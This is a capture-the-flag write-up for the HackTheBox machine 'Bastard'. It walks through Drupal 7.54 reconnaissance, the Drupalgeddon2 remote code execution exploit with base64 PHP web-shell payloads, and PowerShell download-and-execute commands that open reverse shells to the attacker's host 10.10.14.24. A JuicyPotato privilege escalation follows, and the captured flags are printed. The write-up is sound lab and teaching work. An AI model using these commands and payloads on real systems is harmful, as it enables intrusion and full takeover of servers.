HackTheBox - Bastard
Contents
Active Ports
sudo nmap -p80,135,49154 -sC -sV -oA nmap/full-tcp-version 10.10.10.9
# Nmap 7.80 scan initiated Wed Sep 2 13:56:23 2020 as: nmap -p80,135,49154 -sC -sV -oA nmap/full-tcp-version 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.051s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 2 13:57:27 2020 -- 1 IP address (1 host up) scanned in 63.62 seconds
Vulnerability Discovery
The web page was running Drupal 7:
The nmap scan above also showed that there was a robots.txt file which gives some nice insights to some URLs that robots shouldn’t crawl:
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html
...CONTENT SNIPPED...
Disallow: /CHANGELOG.txt
Notice the CHANGELOG.txt file. Visiting that file, I was able to pinpoint the exact version of the software installed:
Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
https://www.drupal.org/node/2826480).
- Logging of searches can now be disabled (new option in the administrative
interface).
- Added menu tree render structure to (pre-)process hooks for theme_menu_tree()
(API addition: https://www.drupal.org/node/2827134).
- Added new function for determining whether an HTTPS request is being served
(API addition: https://www.drupal.org/node/2824590).
- Fixed incorrect default value for short and medium date formats on the date
type configuration page.
- File validation error message is now removed after subsequent upload of valid
file.
- Numerous bug fixes.
- Numerous API documentation improvements.
- Additional performance improvements.
- Additional automated test coverage.
... CONTENT SNIPPED ...
At this point, I went ahead and searched for known vulnerabilities that affcted Drupal <= 7.54:
$ searchsploit drupal 7
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
...CONTENT SNIPPED...
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
...CONTENT SNIPPED...
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploiting Drupal
I mirrored the remote code execution exploit above to my current working directory:
searchsploit -m php/webapps/44449.rb
I also needed to install a missing ruby dependency to run the script:
$ sudo gem install highline
Fetching highline-2.0.3.gem
Successfully installed highline-2.0.3
Parsing documentation for highline-2.0.3
Installing ri documentation for highline-2.0.3
Done installing documentation for highline after 2 seconds
1 gem installed
At this point, I ran the exploit:
$ ruby 44449.rb http://10.10.10.9
ruby: warning: shebang line ending with \r may cause problems
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/
--------------------------------------------------------------------------------
[+] Found : http://10.10.10.9/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo KYYRHMWO
[+] Result : KYYRHMWO
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://10.10.10.9/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Existing file (http://10.10.10.9/sites/default/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (sites/default/)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Existing file (http://10.10.10.9/sites/default/files/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (sites/default/files/)
[*] Moving : ./sites/default/files/.htaccess
[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
[!] FAILED : Couldn't find a writeable web path
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> whoami
nt authority\iusr
drupalgeddon2>>
Notice how above, I was able to execute the whoami command which returned nt authority\iusr which looks like some windows user. Since I figured I was on a windows machine, I mirrored a copy of Invoke-PowerShellTcp.ps1 from the nishang post exploitation framework to escalate to an interactive powershell session.
I appended the following line to my Invoke-PowerShellTcp.ps1 script:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.24 -Port 2001
Via remote code execution with the drupalgeddon exploit script, I downloaded and executed the Invoke-PowerShellTcp.ps1 script from my kali machine:
drupalgeddon2>> powershell -Command "iex(New-Object System.Net.WebClient).DownloadString('http://10.10.14.24:8000/Invoke-PowerShellTcp.ps1')"
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.9 - - [02/Sep/2020 14:26:20] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
$ rlwrap ncat -nlvp 2001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::2001
Ncat: Listening on 0.0.0.0:2001
Ncat: Connection from 10.10.10.9.
Ncat: Connection from 10.10.10.9:49320.
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\inetpub\drupal-7.54>whoami
nt authority\iusr
At this point, I had a reverse netcat powershell session and I grabbed the user flag:
PS C:\users\dimitris> gc C:\users\dimitris\Desktop\user.txt
ba22fde1932d06eb76a163d312f921a2
Privilege Escalation
One of the first things I check for in privilege escalation on windows is to see if the current user I compromised is part of any interesting groups with any special permissions.
PS C:\users\dimitris> whoami /all
USER INFORMATION
----------------
User Name SID
================= ========
nt authority\iusr S-1-5-17
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Group used for deny only
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
In this case, the nt authority\iusr is part of the NT AUTHORITY\SERVICE group and has the SeImpersonatePrivilege privilege. At this point, I checked the operating system version:
PS C:\users\dimitris> systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46 ??
System Boot Time: 2/9/2020, 8:53:28 ??
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.510 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.520 MB
Virtual Memory: In Use: 575 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
With a compromised user that is part of the NT AUTHORITY\SERVICE group and has the SeImpersonatePrivilege privilege, and that the operating system is a 64-bit Windows Server 2008 R2 Datacenter is a recipe for the Juicy Potato exploit. I already had a copy of JuicyPotato on my kali machine, so I went ahead and got the bastard machine to download it from my kali machine:
(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.24:8000/JuicyPotato.exe","C:\Windows\Temp\r0kit\JuicyPotato.exe")
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.9 - - [02/Sep/2020 14:33:20] "GET /JuicyPotato.exe HTTP/1.1" 200 -
At first, the JuicyPotato exploit didn’t work. That was because I needed to change the CLSID to match Windows Server 2008 R2 Datacenter. You can find a list of CLSIDs for Windows Server 2008 R2 Datacenter here.
PS C:\Windows\Temp\r0kit> .\JuicyPotato.exe -l 1337 -p "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "iex(New-Object System.Net.WebClient).DownloadString('http://10.10.14.24:8000/Invoke-PowerShellTcp.ps1')" -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}" -t *
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 1337
....
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
The command above executed the Juicy Potato exploit which invoked an out-of-band powershell process which downloaded and executed the Invoke-PowerShellTcp.ps1 from my kali machine:
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.9 - - [02/Sep/2020 14:38:03] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
Executing Invoke-PowerShellTcp.ps1 via an out-of-band powershell process with SYSTEM privileges connected back to my netcat listener:
$ rlwrap ncat -nvlp 2001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::2001
Ncat: Listening on 0.0.0.0:2001
Ncat: Connection from 10.10.10.9.
Ncat: Connection from 10.10.10.9:49334.
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
At this point, I had compromised the system and grabbed the flag:
PS C:\Users\Administrator\Desktop> gc root.txt.txt
4bf12b963da1b30cc93496f617f7ba7c
Countermeasures
- Update drupal to the latest version currently avaialable.
- Update the operating system to the latest version of Windows Server currently available.